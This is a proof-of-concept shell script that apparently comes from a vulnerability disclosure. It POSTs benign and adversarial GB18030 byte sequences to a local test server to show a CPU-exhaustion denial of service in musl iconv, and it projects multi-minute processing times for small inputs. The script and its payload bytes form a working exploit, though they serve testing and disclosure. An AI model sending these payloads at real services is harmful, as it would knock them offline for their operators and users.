POC / test.sh SH
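#!/bin/sh
#
# test.sh - Send benign and adversarial GB18030 payloads to the server
#
# Run this from your HOST machine while the Docker container is running.
# The server should be at localhost:8080.
#
# Usage: test.sh [host:port]      (default: localhost:8080)
#
# The script POSTs three small bodies labelled "charset=gb18030" and prints
# curl's total request time for each, so the per-character cost of the
# benign and adversarial byte sequences can be compared.
#
# NOTE(review): the server side is not shown here; presumably it converts the
# request body with iconv according to the charset parameter. If so, the
# timings below are the same signal an operator would see as CPU-bound request
# latency, and a per-request processing timeout or an allow-list of accepted
# charsets bounds the impact - confirm against the server code.

set -e

HOST="${1:-localhost:8080}"

# Payloads live in a private directory created by mktemp instead of fixed names
# in /tmp, so another local user cannot pre-create or symlink them, and the
# EXIT trap removes them on every exit path (including a set -e abort).
WORKDIR=$(mktemp -d) || { echo "mktemp failed" >&2; exit 1; }
cleanup() { rm -rf -- "${WORKDIR:?}"; }
trap cleanup EXIT
# Some /bin/sh implementations do not run the EXIT trap on a signal unless
# the signal itself is trapped and turned into a normal exit.
trap 'exit 130' INT
trap 'exit 143' TERM

# POST one payload file and print the response followed by an HTTP_TIME= line.
# Arguments: $1 - path of the payload file
# Returns:   curl's exit status (28 when --max-time is reached)
post_payload() {
    curl -s -w "\nHTTP_TIME=%{time_total}" \
        -X POST \
        -H "Content-Type: text/plain; charset=gb18030" \
        --data-binary "@$1" \
        --max-time 30 \
        "http://$HOST/" 2>&1
}

# Extract the value of the HTTP_TIME= line appended by post_payload.
# Arguments: $1 - captured curl output
extract_time() {
    printf '%s\n' "$1" | grep "HTTP_TIME=" | cut -d= -f2
}

echo "=== musl iconv DoS - End-to-End Test ==="
echo "Target: $HOST"
echo ""

# Generate benign payload: 100 copies of 81 30 81 30 (400 bytes).
# Octal escapes are used because \xHH is not a POSIX printf escape; under a
# strict /bin/sh the hex form is written out literally and the payload is wrong.
# shellcheck disable=SC2046 — word splitting of the seq output is intended
printf '\201\060\201\060%.0s' $(seq 1 100) > "$WORKDIR/benign.bin"
BENIGN_SIZE=$(wc -c < "$WORKDIR/benign.bin")
echo "--- Benign payload: $BENIGN_SIZE bytes (100 chars) ---"

printf 'Sending... '
# Without a baseline the comparison is meaningless, so a failed benign request
# stops the run with a message instead of a silent set -e exit.
RESP_BENIGN=$(post_payload "$WORKDIR/benign.bin") || {
    echo "benign request failed (curl exit status $?)" >&2
    exit 1
}
echo "Done"
echo "$RESP_BENIGN" | head -5
BENIGN_TIME=$(extract_time "$RESP_BENIGN")
echo "curl wall time: ${BENIGN_TIME}s"
echo ""

# Generate adversarial payload: just 5 copies of 82 35 8F 33 (20 bytes)
# Even 5 chars should take >1 second
# shellcheck disable=SC2046
printf '\202\065\217\063%.0s' $(seq 1 5) > "$WORKDIR/adversarial_small.bin"
ADV_SMALL_SIZE=$(wc -c < "$WORKDIR/adversarial_small.bin")
echo "--- Adversarial payload (small): $ADV_SMALL_SIZE bytes (5 chars) ---"
echo "    Expected: ~1.3 seconds (5 * 0.26s per char)"
printf 'Sending... '
# A curl timeout here is itself a result, so report it and keep going rather
# than letting set -e end the run before the summary.
RESP_ADV=$(post_payload "$WORKDIR/adversarial_small.bin") ||
    echo "(curl exit status $?)" >&2
echo "Done"
echo "$RESP_ADV" | head -5
ADV_TIME=$(extract_time "$RESP_ADV")
echo "curl wall time: ${ADV_TIME}s"
echo ""

# Generate medium adversarial payload: 20 copies (80 bytes)
# shellcheck disable=SC2046
printf '\202\065\217\063%.0s' $(seq 1 20) > "$WORKDIR/adversarial_med.bin"
ADV_MED_SIZE=$(wc -c < "$WORKDIR/adversarial_med.bin")
echo "--- Adversarial payload (medium): $ADV_MED_SIZE bytes (20 chars) ---"
echo "    Expected: ~5.2 seconds (20 * 0.26s per char)"
printf 'Sending (30s timeout)... '
RESP_ADV_MED=$(post_payload "$WORKDIR/adversarial_med.bin") ||
    echo "(curl exit status $?)" >&2
echo "Done"
echo "$RESP_ADV_MED" | head -5
ADV_MED_TIME=$(extract_time "$RESP_ADV_MED")
echo "curl wall time: ${ADV_MED_TIME}s"
echo ""

echo "=== Summary ==="
echo "Benign (400 bytes, 100 chars):       ${BENIGN_TIME}s"
echo "Adversarial (20 bytes, 5 chars):     ${ADV_TIME}s"
echo "Adversarial (80 bytes, 20 chars):    ${ADV_MED_TIME}s"
echo ""
echo "If adversarial times are orders of magnitude slower than benign,"
echo "the vulnerability is confirmed end-to-end."
echo ""
echo "Projected:"
echo "  100 adversarial chars (400 bytes):   ~26 seconds"
echo "  1000 adversarial chars (4 KB):       ~4.3 minutes"
echo "  10000 adversarial chars (40 KB):     ~43 minutes"

# Payload files are removed by the EXIT trap installed above.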